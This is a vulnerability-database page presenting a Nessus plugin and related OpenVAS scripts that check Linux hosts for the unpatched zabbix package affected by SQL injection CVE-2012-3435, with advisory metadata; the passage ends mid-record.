Search...

Fedora 16 : zabbix-1.8.15-1.fc16 (2012-12488)

2012-08-31T00:00:00

ID FEDORA_2012-12488.NASL
Type nessus
Reporter This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2012-08-31T00:00:00

Description

Release notes: http://www.zabbix.com/rn1.8.15.php

Amongst others :

Solves SQL injection vulnerability CVE-2012-3435

Removes useless backup files from the frontend

Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Fedora Security Advisory 2012-12488.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(61736);
  script_version("1.15");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/11");

  script_bugtraq_id(54661);
  script_xref(name:"FEDORA", value:"2012-12488");

  script_name(english:"Fedora 16 : zabbix-1.8.15-1.fc16 (2012-12488)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Release notes: http://www.zabbix.com/rn1.8.15.php

Amongst others :

  - Solves SQL injection vulnerability CVE-2012-3435

    - Removes useless backup files from the frontend

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  # http://www.zabbix.com/rn1.8.15.php
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.zabbix.com/rn/rn1.8.15"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.redhat.com/show_bug.cgi?id=843927"
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2012-August/085818.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?44d38715"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Update the affected zabbix package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"d2_elliot_name", value:"Zabbix 2.0 SQL Injection");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:zabbix");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:16");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/08/22");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/08/22");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/08/31");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" &gt;!&lt; release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^16([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 16.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" &gt;!&lt; cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC16", reference:"zabbix-1.8.15-1.fc16")) flag++;


if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "zabbix");
}

JSON Vulners Source

Initial Source

{"id": "FEDORA_2012-12488.NASL", "bulletinFamily": "scanner", "title": "Fedora 16 : zabbix-1.8.15-1.fc16 (2012-12488)", "description": "Release notes: http://www.zabbix.com/rn1.8.15.php\n\nAmongst others :\n\n - Solves SQL injection vulnerability CVE-2012-3435\n\n - Removes useless backup files from the frontend\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2012-08-31T00:00:00", "modified": "2012-08-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/61736", "reporter": "This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.zabbix.com/rn/rn1.8.15", "http://www.nessus.org/u?44d38715", "https://bugzilla.redhat.com/show_bug.cgi?id=843927"], "cvelist": ["CVE-2012-3435"], "type": "nessus", "lastseen": "2021-01-12T10:09:58", "edition": 16, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-3435"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310864689", "OPENVAS:136141256231072168", "OPENVAS:864690", "OPENVAS:72168", "OPENVAS:1361412562310121074", "OPENVAS:1361412562310864690", "OPENVAS:864689"]}, {"type": "dsquare", "idList": ["E-80"]}, {"type": "exploitdb", "idList": ["EDB-ID:20087"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28539", "SECURITYVULNS:VULN:12579"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2539-1:52838"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2539.NASL", "GENTOO_GLSA-201311-15.NASL", "FEDORA_2012-12496.NASL", "ZABBIX_FRONTEND_ITEMID_SQLI.NASL"]}, {"type": "fedora", "idList": ["FEDORA:59F8C20AE3", "FEDORA:6EF6721013"]}, {"type": "gentoo", "idList": ["GLSA-201311-15"]}], "modified": "2021-01-12T10:09:58", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-01-12T10:09:58", "rev": 2}, "vulnersScore": 6.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-12488.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61736);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(54661);\n script_xref(name:\"FEDORA\", value:\"2012-12488\");\n\n script_name(english:\"Fedora 16 : zabbix-1.8.15-1.fc16 (2012-12488)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Release notes: http://www.zabbix.com/rn1.8.15.php\n\nAmongst others :\n\n - Solves SQL injection vulnerability CVE-2012-3435\n\n - Removes useless backup files from the frontend\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.zabbix.com/rn1.8.15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.zabbix.com/rn/rn1.8.15\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=843927\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-August/085818.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44d38715\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zabbix package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Zabbix 2.0 SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zabbix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"zabbix-1.8.15-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zabbix\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "61736", "cpe": ["p-cpe:/a:fedoraproject:fedora:zabbix", "cpe:/o:fedoraproject:fedora:16"], "scheme": null}

{"cve": [{"lastseen": "2020-12-09T19:47:21", "description": "SQL injection vulnerability in frontends/php/popup_bitem.php in Zabbix 1.8.15rc1 and earlier, and 2.x before 2.0.2rc1, allows remote attackers to execute arbitrary SQL commands via the itemid parameter.", "edition": 5, "cvss3": {}, "published": "2012-08-15T20:55:00", "title": "CVE-2012-3435", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3435"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:zabbix:zabbix:1.6.7", "cpe:/a:zabbix:zabbix:1.1.1", "cpe:/a:zabbix:zabbix:1.1.5", "cpe:/a:zabbix:zabbix:1.8.3", "cpe:/a:zabbix:zabbix:1.1.2", "cpe:/a:zabbix:zabbix:1.8", "cpe:/a:zabbix:zabbix:1.3.8", "cpe:/a:zabbix:zabbix:1.7", "cpe:/a:zabbix:zabbix:1.6.5", "cpe:/a:zabbix:zabbix:1.8.2", "cpe:/a:zabbix:zabbix:1.1.3", "cpe:/a:zabbix:zabbix:1.5", "cpe:/a:zabbix:zabbix:1.3.7", "cpe:/a:zabbix:zabbix:1.3.6", "cpe:/a:zabbix:zabbix:1.7.4", "cpe:/a:zabbix:zabbix:2.0.1", "cpe:/a:zabbix:zabbix:1.8.15", "cpe:/a:zabbix:zabbix:2.0.0", "cpe:/a:zabbix:zabbix:1.3.3", "cpe:/a:zabbix:zabbix:1.6.4", "cpe:/a:zabbix:zabbix:1.6.2", "cpe:/a:zabbix:zabbix:1.3", "cpe:/a:zabbix:zabbix:1.4.4", "cpe:/a:zabbix:zabbix:1.6.8", "cpe:/a:zabbix:zabbix:1.6.6", "cpe:/a:zabbix:zabbix:1.7.3", "cpe:/a:zabbix:zabbix:1.6.9", "cpe:/a:zabbix:zabbix:1.3.1", "cpe:/a:zabbix:zabbix:1.4.5", "cpe:/a:zabbix:zabbix:1.7.2", "cpe:/a:zabbix:zabbix:1.3.5", "cpe:/a:zabbix:zabbix:1.5.2", "cpe:/a:zabbix:zabbix:1.6.3", "cpe:/a:zabbix:zabbix:1.1", "cpe:/a:zabbix:zabbix:1.1.6", "cpe:/a:zabbix:zabbix:1.5.3", "cpe:/a:zabbix:zabbix:1.4.2", "cpe:/a:zabbix:zabbix:1.1.4", "cpe:/a:zabbix:zabbix:1.4.6", "cpe:/a:zabbix:zabbix:1.3.2", "cpe:/a:zabbix:zabbix:1.5.4", "cpe:/a:zabbix:zabbix:1.6.1", "cpe:/a:zabbix:zabbix:1.8.1", "cpe:/a:zabbix:zabbix:1.6", "cpe:/a:zabbix:zabbix:1.7.1", "cpe:/a:zabbix:zabbix:1.3.4", "cpe:/a:zabbix:zabbix:1.4.3", "cpe:/a:zabbix:zabbix:1.5.1", "cpe:/a:zabbix:zabbix:1.1.7"], "id": "CVE-2012-3435", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3435", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zabbix:zabbix:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.5.4:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.0.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta8:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.3.6:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta12:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.3.1:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.3.8:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.5.3:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.3.5:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta6:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta5:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta9:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.0.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta7:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.8:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta3:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.3.3:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.5:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.3.4:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.8.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.0.0:rc6:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta4:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.7:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.3.7:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.8.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.8.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.5.2:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta10:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta11:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.3.2:beta:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1:beta2:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:1.5.1:beta:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:50:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3435"], "description": "The remote host is missing an update to zabbix\nannounced via advisory DSA 2539-1.", "modified": "2017-07-07T00:00:00", "published": "2012-09-15T00:00:00", "id": "OPENVAS:72168", "href": "http://plugins.openvas.org/nasl.php?oid=72168", "type": "openvas", "title": "Debian Security Advisory DSA 2539-1 (zabbix)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2539_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2539-1 (zabbix)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that Zabbix, a network monitoring solution, does not\nproperly validate user input used as a part of an SQL query. This may\nallow unauthenticated attackers to execute arbitrary SQL commands (SQL\ninjection) and possibly escalate privileges.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:1.8.2-1squeeze4.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.0.2+dfsg-1.\n\nWe recommend that you upgrade your zabbix packages.\";\ntag_summary = \"The remote host is missing an update to zabbix\nannounced via advisory DSA 2539-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202539-1\";\n\nif(description)\n{\n script_id(72168);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2012-3435\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-15 04:23:46 -0400 (Sat, 15 Sep 2012)\");\n script_name(\"Debian Security Advisory DSA 2539-1 (zabbix)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"zabbix-agent\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-frontend-php\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-proxy-mysql\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-proxy-pgsql\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-server-mysql\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-server-pgsql\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:56:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3435"], "description": "Check for the Version of zabbix", "modified": "2018-01-02T00:00:00", "published": "2012-09-04T00:00:00", "id": "OPENVAS:864690", "href": "http://plugins.openvas.org/nasl.php?oid=864690", "type": "openvas", "title": "Fedora Update for zabbix FEDORA-2012-12496", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zabbix FEDORA-2012-12496\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ZABBIX is software that monitors numerous parameters of a network and\n the health and integrity of servers. ZABBIX uses a flexible\n notification mechanism that allows users to configure e-mail based\n alerts for virtually any event. This allows a fast reaction to server\n problems. ZABBIX offers excellent reporting and data visualisation\n features based on the stored data. This makes ZABBIX ideal for\n capacity planning.\n\n ZABBIX supports both polling and trapping. All ZABBIX reports and\n statistics, as well as configuration parameters are accessed through a\n web-based front end. A web-based front end ensures that the status of\n your network and the health of your servers can be assessed from any\n location. Properly configured, ZABBIX can play an important role in\n monitoring IT infrastructure. This is equally true for small\n organisations with a few servers and for large companies with a\n multitude of servers.\";\n\ntag_affected = \"zabbix on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085844.html\");\n script_id(864690);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:34:52 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-3435\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-12496\");\n script_name(\"Fedora Update for zabbix FEDORA-2012-12496\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of zabbix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"zabbix\", rpm:\"zabbix~1.8.15~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3435"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": 